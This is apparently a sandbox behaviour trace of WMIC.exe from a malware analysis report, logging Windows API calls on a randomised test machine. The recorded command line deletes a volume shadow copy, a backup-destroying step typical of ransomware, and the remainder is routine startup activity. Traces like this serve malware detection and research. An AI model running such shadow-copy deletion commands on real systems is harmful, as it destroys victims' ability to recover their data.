"C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 130 os_tid = 0xab8 [0091.790] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20f930 | out: lpSystemTimeAsFileTime=0x20f930*(dwLowDateTime=0x3e52e2b0, dwHighDateTime=0x1d68245)) [0091.790] GetCurrentProcessId () returned 0xae8 [0091.790] GetCurrentThreadId () returned 0xab8 [0091.790] GetTickCount () returned 0x114cb6a [0091.790] QueryPerformanceCounter (in: lpPerformanceCount=0x20f938 | out: lpPerformanceCount=0x20f938*=21168290543) returned 1 [0091.793] GetModuleHandleW (lpModuleName=0x0) returned 0xff390000 [0091.793] __set_app_type (_Type=0x1) [0091.793] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff3dced0) returned 0x0 [0091.794] __wgetmainargs (in: _Argc=0xff402380, _Argv=0xff402390, _Env=0xff402388, _DoWildCard=0, _StartInfo=0xff40239c | out: _Argc=0xff402380, _Argv=0xff402390, _Env=0xff402388) returned 0 [0091.794] ??0CHString@@QEAA@XZ () returned 0xff402ab0 [0091.794] malloc (_Size=0x30) returned 0x2f5a50 [0091.794] malloc (_Size=0x70) returned 0x2f5a90 [0091.794] malloc (_Size=0x50) returned 0x2f7d30 [0091.794] malloc (_Size=0x30) returned 0x2f7d90 [0091.794] malloc (_Size=0x48) returned 0x2f7dd0 [0091.795] malloc (_Size=0x30) returned 0x2f7e20 [0091.795] malloc (_Size=0x30) returned 0x2f7e60 [0091.795] ??0CHString@@QEAA@XZ () returned 0xff402f58 [0091.795] malloc (_Size=0x30) returned 0x2f7ea0 [0091.795] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0091.795] SetConsoleCtrlHandler (HandlerRoutine=0xff3d5724, Add=1) returned 1 [0091.795] _onexit (_Func=0xff3ef378) returned 0xff3ef378 [0091.795] _onexit (_Func=0xff3ef490) returned 0xff3ef490 [0091.795] _onexit (_Func=0xff3ef4d0) returned 0xff3ef4d0 [0091.795] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0091.795] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0091.799] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0091.805] CoCreateInstance (in: rclsid=0xff3973a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff397370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xff402940 | out: ppv=0xff402940*=0x1df1390) returned 0x0 [0091.814] GetCurrentProcess () returned 0xffffffffffffffff [0091.815] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x20f700 | out: TokenHandle=0x20f700*=0xf4) returned 1 [0091.815] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f6f8 | out: TokenInformation=0x0, ReturnLength=0x20f6f8) returned 0 [0091.815] malloc (_Size=0x118) returned 0x2f69a0 [0091.815] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x2f69a0, TokenInformationLength=0x118, ReturnLength=0x20f6f8 | out: TokenInformation=0x2f69a0, ReturnLength=0x20f6f8) returned 1 [0091.815] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x2f69a0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=1645548907, Attributes=0x4c95), (Luid.LowPart=0x0, Luid.HighPart=3112672, Attributes=0x0), (Luid.LowPart=0x64006e, Luid.HighPart=7798895, Attributes=0x3b0073), (Luid.LowPart=0x57005c, Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x53005c, Luid.HighPart=7536761, Attributes=0x650074), (Luid.LowPart=0x5c0032, Luid.HighPart=6422615, Attributes=0x6d0065))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0091.815] free (_Block=0x2f69a0) [0091.815] CloseHandle (hObject=0xf4) returned 1 [0091.815] malloc (_Size=0x40) returned 0x2f7ee0 [0091.815] malloc (_Size=0x40) returned 0x2f7f30 [0091.815] malloc (_Size=0x40) returned 0x2f7f80 [0091.815] malloc (_Size=0x20a) returned 0x2f69a0 [0091.815] GetSystemDirectoryW (in: lpBuffer=0x2f69a0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0091.815] free (_Block=0x2f69a0) [0091.815] malloc (_Size=0x18) returned 0x30dfb0 [0091.815] malloc (_Size=0x18) returned 0x2f69a0 [0091.816] malloc (_Size=0x18) returned 0x2f69c0 [0091.816] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0091.816] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0091.816] free (_Block=0x30dfb0) [0091.816] free (_Block=0x2f69a0) [0091.816] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0091.816] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0091.816] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0091.817] FreeLibrary (hLibModule=0x77940000) returned 1 [0091.817] free (_Block=0x2f69c0) [0091.817] _vsnwprintf (in: _Buffer=0x2f7f80, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x20f328 | out: _Buffer="ms_409") returned 6 [0091.817] malloc (_Size=0x20) returned 0x2f69a0 [0091.817] GetComputerNameW (in: lpBuffer=0x2f69a0, nSize=0x20f700 | out: lpBuffer="XDUWTFONO", nSize=0x20f700) returned 1 [0091.817] lstrlenW (lpString="XDUWTFONO") returned 9 [0091.817] malloc (_Size=0x14) returned 0x30dfb0 [0091.817] lstrlenW (lpString="XDUWTFONO") returned 9 [0091.817] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x20f6f8 | out: lpNameBuffer=0x0, nSize=0x20f6f8) returned 0x7fffffde000 [0091.818] GetLastError () returned 0xea [0091.818] malloc (_Size=0x40) returned 0x2f69d0 [0091.818] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2f69d0, nSize=0x20f6f8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x20f6f8) returned 0x1 [0091.818] lstrlenW (lpString="") returned 0 [0091.818] lstrlenW (lpString="XDUWTFONO") returned 9 [0091.818] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0091.819] lstrlenW (lpString=".") returned 1 [0091.819] lstrlenW (lpString="XDUWTFONO") returned 9 [0091.819] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0091.819] lstrlenW (lpString="LOCALHOST") returned 9 [0091.819] lstrlenW (lpString="XDUWTFONO") returned 9 [0091.819] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0091.819] lstrlenW (lpString="XDUWTFONO") returned 9 [0091.819] lstrlenW (lpString="XDUWTFONO") returned 9 [0091.819] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0091.819] free (_Block=0x30dfb0) [0091.819] lstrlenW (lpString="XDUWTFONO") returned 9 [0091.819] malloc (_Size=0x14) returned 0x30dfb0 [0091.819] lstrlenW (lpString="XDUWTFONO") returned 9 [0091.820] lstrlenW (lpString="XDUWTFONO") returned 9 [0091.820] malloc (_Size=0x14) returned 0x2f6a20 [0091.820] lstrlenW (lpString="XDUWTFONO") returned 9 [0091.820] malloc (_Size=0x8) returned 0x2f6a40 [0091.820] malloc (_Size=0x18) returned 0x2f6a60 [0091.820] malloc (_Size=0x30) returned 0x2f6a80 [0091.820] malloc (_Size=0x18) returned 0x2f6ac0 [0091.820] SysStringLen (param_1="IDENTIFY") returned 0x8 [0091.820] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0091.820] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0091.820] SysStringLen (param_1="IDENTIFY") returned 0x8 [0091.820] malloc (_Size=0x30) returned 0x2f6ae0 [0091.820] malloc (_Size=0x18) returned 0x2f6b20 [0091.820] SysStringLen (param_1="IMPERSONATE") returned 0xb [0091.820] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0091.820] SysStringLen (param_1="IMPERSONATE") returned 0xb [0091.820] SysStringLen (param_1="IDENTIFY") returned 0x8 [0091.820] SysStringLen (param_1="IDENTIFY") returned 0x8 [0091.820] SysStringLen (param_1="IMPERSONATE") returned 0xb [0091.820] malloc (_Size=0x30) returned 0x2f6b40 [0091.820] malloc (_Size=0x18) returned 0x2f6b80 [0091.820] SysStringLen (param_1="DELEGATE") returned 0x8 [0091.820] SysStringLen (param_1="IDENTIFY") returned 0x8 [0091.820] SysStringLen (param_1="DELEGATE") returned 0x8 [0091.820] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0091.820] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0091.820] SysStringLen (param_1="DELEGATE") returned 0x8 [0091.820] malloc (_Size=0x30) returned 0x2f6ba0 [0091.820] malloc (_Size=0x18) returned 0x2f6be0 [0091.820] malloc (_Size=0x30) returned 0x2f6c00 [0091.821] malloc (_Size=0x18) returned 0x2f6c40 [0091.821] SysStringLen (param_1="NONE") returned 0x4 [0091.821] SysStringLen (param_1="DEFAULT") returned 0x7 [0091.821] SysStringLen (param_1="DEFAULT") returned 0x7 [0091.821] SysStringLen (param_1="NONE") returned 0x4 [0091.821] malloc (_Size=0x30) returned 0x2f6c60 [0091.821] malloc (_Size=0x18) returned 0x2f6ca0 [0091.821] SysStringLen (param_1="CONNECT") returned 0x7 [0091.821] SysStringLen (param_1="DEFAULT") returned 0x7 [0091.821] malloc (_Size=0x30) returned 0x2f6cc0 [0091.821] malloc (_Size=0x18) returned 0x2f6d00 [0091.821] SysStringLen (param_1="CALL") returned 0x4 [0091.821] SysStringLen (param_1="DEFAULT") returned 0x7 [0091.821] SysStringLen (param_1="CALL") returned 0x4 [0091.821] SysStringLen (param_1="CONNECT") returned 0x7 [0091.821] malloc (_Size=0x30) returned 0x2f6d20 [0091.821] malloc (_Size=0x18) returned 0x2f6d60 [0091.821] SysStringLen (param_1="PKT") returned 0x3 [0091.821] SysStringLen (param_1="DEFAULT") returned 0x7 [0091.821] SysStringLen (param_1="PKT") returned 0x3 [0091.821] SysStringLen (param_1="NONE") returned 0x4 [0091.821] SysStringLen (param_1="NONE") returned 0x4 [0091.821] SysStringLen (param_1="PKT") returned 0x3 [0091.821] malloc (_Size=0x30) returned 0x2f6d80 [0091.821] malloc (_Size=0x18) returned 0x2f6dc0 [0091.821] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0091.821] SysStringLen (param_1="DEFAULT") returned 0x7 [0091.821] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0091.821] SysStringLen (param_1="NONE") returned 0x4 [0091.821] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0091.821] SysStringLen (param_1="PKT") returned 0x3 [0091.821] SysStringLen (param_1="PKT") returned 0x3 [0091.821] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0091.821] malloc (_Size=0x30) returned 0x2f8000 [0091.822] malloc (_Size=0x18) returned 0x2f6de0 [0091.822] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0091.822] SysStringLen (param_1="DEFAULT") returned 0x7 [0091.822] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0091.822] SysStringLen (param_1="PKT") returned 0x3 [0091.822] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0091.822] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0091.822] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0091.822] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0091.822] malloc (_Size=0x30) returned 0x2f8040 [0091.822] malloc (_Size=0x40) returned 0x2f6e00 [0091.822] malloc (_Size=0x20a) returned 0x2f6e50 [0091.822] GetSystemDirectoryW (in: lpBuffer=0x2f6e50, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0091.822] free (_Block=0x2f6e50) [0091.822] malloc (_Size=0x18) returned 0x2f6e50 [0091.822] malloc (_Size=0x18) returned 0x2f6e70 [0091.822] malloc (_Size=0x18) returned 0x2f6e90 [0091.823] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0091.823] SysStringLen (param_1="\\wbem\\") returned 0x6 [0091.823] free (_Block=0x2f6e50) [0091.823] free (_Block=0x2f6e70) [0091.823] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0091.823] free (_Block=0x2f6e90) [0091.823] malloc (_Size=0x18) returned 0x2f6e50 [0091.823] malloc (_Size=0x18) returned 0x2f6e70 [0091.823] malloc (_Size=0x18) returned 0x2f6e90 [0091.823] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0091.823] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0091.823] free (_Block=0x2f6e50) [0091.823] free (_Block=0x2f6e70) [0091.823] GetCurrentThreadId () returned 0xab8 [0091.823] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x20f000 | out: phkResult=0x20f000*=0xf8) returned 0x0 [0091.823] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x20f050, lpcbData=0x20eff0*=0x400 | out: lpType=0x0, lpData=0x20f050*=0x30, lpcbData=0x20eff0*=0x4) returned 0x0 [0091.823] _wcsicmp (_String1="0", _String2="1") returned -1 [0091.823] _wcsicmp (_String1="0", _String2="2") returned -2 [0091.823] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x20eff0*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x20eff0*=0x42) returned 0x0 [0091.823] malloc (_Size=0x86) returned 0x2f6eb0 [0091.824] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x2f6eb0, lpcbData=0x20eff0*=0x42 | out: lpType=0x0, lpData=0x2f6eb0*=0x25, lpcbData=0x20eff0*=0x42) returned 0x0 [0091.824] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0091.824] malloc (_Size=0x42) returned 0x2f6f40 [0091.824] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0091.824] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x20f050, lpcbData=0x20eff0*=0x400 | out: lpType=0x0, lpData=0x20f050*=0x36, lpcbData=0x20eff0*=0xc) returned 0x0 [0091.824] _wtol (_String="65536") returned 65536 [0091.824] free (_Block=0x2f6eb0) [0091.824] RegCloseKey (hKey=0x0) returned 0x6 [0091.824] CoCreateInstance (in: rclsid=0xff397410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff3973f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x20f4f8 | out: ppv=0x20f4f8*=0x23271d0) returned 0x0 [0091.838] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x23271d0, xmlSource=0x20f640*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x2f6e50), isSuccessful=0x20f6b0 | out: isSuccessful=0x20f6b0*=0xffff) returned 0x0 [0091.941] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x23271d0, DOMElement=0x20f4f0 | out: DOMElement=0x20f4f0) returned 0x0 [0091.941] malloc (_Size=0x18) returned 0x2f6e50 [0091.941] free (_Block=0x2f6e50) [0091.941] malloc (_Size=0x18) returned 0x2f6e50 [0091.941] free (_Block=0x2f6e50) [0091.942] malloc (_Size=0x18) returned 0x2f6e50 [0091.942] malloc (_Size=0x18) returned 0x2f6e70 [0091.942] malloc (_Size=0x30) returned 0x2f8080 [0091.942] malloc (_Size=0x18) returned 0x2f6eb0 [0091.942] free (_Block=0x2f6eb0) [0091.942] malloc (_Size=0x18) returned 0x2fc560 [0091.942] malloc (_Size=0x18) returned 0x2fc580 [0091.942] SysStringLen (param_1="VALUE") returned 0x5 [0091.942] SysStringLen (param_1="TABLE") returned 0x5 [0091.942] SysStringLen (param_1="TABLE") returned 0x5 [0091.942] SysStringLen (param_1="VALUE") returned 0x5 [0091.942] malloc (_Size=0x30) returned 0x2f80c0 [0091.943] malloc (_Size=0x18) returned 0x2fc5a0 [0091.943] free (_Block=0x2fc5a0) [0091.943] malloc (_Size=0x18) returned 0x2fc5a0 [0091.943] malloc (_Size=0x18) returned 0x2fc5c0 [0091.943] SysStringLen (param_1="LIST") returned 0x4 [0091.943] SysStringLen (param_1="TABLE") returned 0x5 [0091.943] malloc (_Size=0x30) returned 0x2f8100 [0091.943] malloc (_Size=0x18) returned 0x2fc5e0 [0091.943] free (_Block=0x2fc5e0) [0091.943] malloc (_Size=0x18) returned 0x2fc5e0 [0091.943] malloc (_Size=0x18) returned 0x2fc600 [0091.943] SysStringLen (param_1="RAWXML") returned 0x6 [0091.943] SysStringLen (param_1="TABLE") returned 0x5 [0091.943] SysStringLen (param_1="RAWXML") returned 0x6 [0091.943] SysStringLen (param_1="LIST") returned 0x4 [0091.943] SysStringLen (param_1="LIST") returned 0x4 [0091.943] SysStringLen (param_1="RAWXML") returned 0x6 [0091.944] malloc (_Size=0x30) returned 0x2f8140 [0091.944] malloc (_Size=0x18) returned 0x2fc620 [0091.944] free (_Block=0x2fc620) [0091.944] malloc (_Size=0x18) returned 0x2fc620 [0091.944] malloc (_Size=0x18) returned 0x2fc640 [0091.944] SysStringLen (param_1="HTABLE") returned 0x6 [0091.944] SysStringLen (param_1="TABLE") returned 0x5 [0091.944] SysStringLen (param_1="HTABLE") returned 0x6 [0091.944] SysStringLen (param_1="LIST") returned 0x4 [0091.944] malloc (_Size=0x30) returned 0x2f8180 [0091.944] malloc (_Size=0x18) returned 0x2fc660 [0091.944] free (_Block=0x2fc660) [0091.944] malloc (_Size=0x18) returned 0x2fc660 [0091.944] malloc (_Size=0x18) returned 0x2fc680 [0091.945] SysStringLen (param_1="HFORM") returned 0x5 [0091.945] SysStringLen (param_1="TABLE") returned 0x5 [0091.945] SysStringLen (param_1="HFORM") returned 0x5 [0091.945] SysStringLen (param_1="LIST") returned 0x4 [0091.945] SysStringLen (param_1="HFORM") returned 0x5 [0091.945] SysStringLen (param_1="HTABLE") returned 0x6 [0091.945] malloc (_Size=0x30) returned 0x2f81c0 [0091.945] malloc (_Size=0x18) returned 0x2fc6a0 [0091.945] free (_Block=0x2fc6a0) [0091.945] malloc (_Size=0x18) returned 0x2fc6a0 [0091.945] malloc (_Size=0x18) returned 0x2fc6c0 [0091.945] SysStringLen (param_1="XML") returned 0x3 [0091.945] SysStringLen (param_1="TABLE") returned 0x5 [0091.945] SysStringLen (param_1="XML") returned 0x3 [0091.945] SysStringLen (param_1="VALUE") returned 0x5 [0091.945] SysStringLen (param_1="VALUE") returned 0x5 [0091.946] SysStringLen (param_1="XML") returned 0x3 [0091.946] malloc (_Size=0x30) returned 0x2f8200 [0091.946] malloc (_Size=0x18) returned 0x2fc6e0 [0091.946] free (_Block=0x2fc6e0) [0091.946] malloc (_Size=0x18) returned 0x2fc6e0 [0091.946] malloc (_Size=0x18) returned 0x2fc700 [0091.946] SysStringLen (param_1="MOF") returned 0x3 [0091.946] SysStringLen (param_1="TABLE") returned 0x5 [0091.946] SysStringLen (param_1="MOF") returned 0x3 [0091.946] SysStringLen (param_1="LIST") returned 0x4 [0091.946] SysStringLen (param_1="MOF") returned 0x3 [0091.946] SysStringLen (param_1="RAWXML") returned 0x6 [0091.946] SysStringLen (param_1="LIST") returned 0x4 [0091.946] SysStringLen (param_1="MOF") returned 0x3 [0091.946] malloc (_Size=0x30) returned 0x2f8240 [0091.946] malloc (_Size=0x18) returned 0x2fc720 [0091.947] free (_Block=0x2fc720) [0091.947] malloc (_Size=0x18) returned 0x2fc720 [0091.947] malloc (_Size=0x18) returned 0x2fc740 [0091.947] SysStringLen (param_1="CSV") returned 0x3 [0091.947] SysStringLen (param_1="TABLE") returned 0x5 [0091.947] SysStringLen (param_1="CSV") returned 0x3 [0091.947] SysStringLen (param_1="LIST") returned 0x4 [0091.947] SysStringLen (param_1="CSV") returned 0x3 [0091.947] SysStringLen (param_1="HTABLE") returned 0x6 [0091.947] SysStringLen (param_1="CSV") returned 0x3 [0091.947] SysStringLen (param_1="HFORM") returned 0x5 [0091.947] malloc (_Size=0x30) returned 0x2f8280 [0091.947] malloc (_Size=0x18) returned 0x2fc760 [0091.947] free (_Block=0x2fc760) [0091.947] malloc (_Size=0x18) returned 0x2fc760 [0091.947] malloc (_Size=0x18) returned 0x2fc780 [0091.947] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0091.947] SysStringLen (param_1="TABLE") returned 0x5 [0091.947] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0091.947] SysStringLen (param_1="VALUE") returned 0x5 [0091.948] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0091.948] SysStringLen (param_1="XML") returned 0x3 [0091.948] SysStringLen (param_1="XML") returned 0x3 [0091.948] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0091.948] malloc (_Size=0x30) returned 0x2f82c0 [0091.948] malloc (_Size=0x18) returned 0x2fc7a0 [0091.948] free (_Block=0x2fc7a0) [0091.948] malloc (_Size=0x18) returned 0x2fc7a0 [0091.948] malloc (_Size=0x18) returned 0x2fc7c0 [0091.948] SysStringLen (param_1="texttablewsys") returned 0xd [0091.948] SysStringLen (param_1="TABLE") returned 0x5 [0091.948] SysStringLen (param_1="texttablewsys") returned 0xd [0091.948] SysStringLen (param_1="XML") returned 0x3 [0091.948] SysStringLen (param_1="texttablewsys") returned 0xd [0091.948] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0091.948] SysStringLen (param_1="XML") returned 0x3 [0091.948] SysStringLen (param_1="texttablewsys") returned 0xd [0091.948] malloc (_Size=0x30) returned 0x2f8300 [0091.948] malloc (_Size=0x18) returned 0x2fc7e0 [0091.949] free (_Block=0x2fc7e0) [0091.949] malloc (_Size=0x18) returned 0x2fc7e0 [0091.949] malloc (_Size=0x18) returned 0x2fc800 [0091.949] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0091.949] SysStringLen (param_1="TABLE") returned 0x5 [0091.949] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0091.949] SysStringLen (param_1="XML") returned 0x3 [0091.949] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0091.949] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0091.949] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0091.949] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0091.949] malloc (_Size=0x30) returned 0x2f8340 [0091.949] malloc (_Size=0x18) returned 0x2fc820 [0091.949] free (_Block=0x2fc820) [0091.949] malloc (_Size=0x18) returned 0x2fc820 [0091.949] malloc (_Size=0x18) returned 0x2fc840 [0091.950] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0091.950] SysStringLen (param_1="TABLE") returned 0x5 [0091.950] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0091.950] SysStringLen (param_1="XML") returned 0x3 [0091.950] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0091.950] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0091.950] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0091.950] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0091.950] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0091.950] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0091.950] malloc (_Size=0x30) returned 0x2f8380 [0091.950] malloc (_Size=0x18) returned 0x2fc860 [0091.950] free (_Block=0x2fc860) [0091.950] malloc (_Size=0x18) returned 0x2fc860 [0091.950] malloc (_Size=0x18) returned 0x2fc880 [0091.950] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0091.950] SysStringLen (param_1="TABLE") returned 0x5 [0091.950] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0091.950] SysStringLen (param_1="XML") returned 0x3 [0091.950] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0091.950] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0091.950] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0091.950] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0091.950] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0091.951] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0091.951] malloc (_Size=0x30) returned 0x2f83c0 [0091.951] malloc (_Size=0x18) returned 0x2fc8a0 [0091.951] free (_Block=0x2fc8a0) [0091.951] malloc (_Size=0x18) returned 0x2fc8a0 [0091.951] malloc (_Size=0x18) returned 0x2fc8c0 [0091.951] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0091.951] SysStringLen (param_1="TABLE") returned 0x5 [0091.951] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0091.951] SysStringLen (param_1="XML") returned 0x3 [0091.951] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0091.951] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0091.951] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0091.951] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0091.951] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0091.951] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0091.951] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0091.951] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0091.951] malloc (_Size=0x30) returned 0x2f8400 [0091.952] malloc (_Size=0x18) returned 0x2fc8e0 [0091.952] free (_Block=0x2fc8e0) [0091.952] malloc (_Size=0x18) returned 0x2fc8e0 [0091.952] malloc (_Size=0x18) returned 0x2fc900 [0091.952] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0091.952] SysStringLen (param_1="TABLE") returned 0x5 [0091.952] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0091.952] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 